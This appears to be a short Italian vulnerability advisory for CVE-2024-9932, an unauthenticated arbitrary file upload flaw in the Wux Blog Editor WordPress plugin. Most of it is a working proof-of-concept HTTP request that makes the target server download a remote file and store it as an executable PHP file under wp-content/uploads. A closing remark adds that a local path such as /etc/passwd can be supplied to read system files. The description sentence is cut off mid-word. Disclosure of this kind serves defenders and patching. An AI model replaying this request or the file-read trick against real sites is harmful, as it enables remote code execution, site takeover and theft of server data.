
Wux Blog Editor <= 3.0.0 - Caricamento arbitrario di file non autenticato
Wux Blog Editor <= 3.0.0 - Caricamento arbitrario di file non autenticato
Il plugin Wux Blog Editor per WordPress è vulnerabile a caricamenti arbitrari di file a causa di una validazione insufficiente del tipo di file nella funzione 'wuxbt_insertImageNew' nelle versioni fino alla 3.0.0 inclusa. Ciò rende possibile per attaccanti non autenticati caricare file arbitrari sul server del sito interessato, il che potrebbe rendere possibile l'esecuzione di codice remoto possi
Link: CVE-2024-9932
State: PUBLISHED
Score: 9.8
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
POST /wp-json/external-post-editor/v2/image-upload HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/plugins.php?plugin_status=all&paged=1&s
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 165
Origin: http://kubernetes.docker.internal
Connection: keep-alive
{
"url": "https://rfi.nessus.org/rfi.txt",
"imageName": "rf.php",
"image_alt": "Description of the image",
"image_title": "Title of the image"
}
Il file è finito in /wp-content/uploads/2024/11/rf.php
Puoi anche fornire un percorso file come /etc/passwd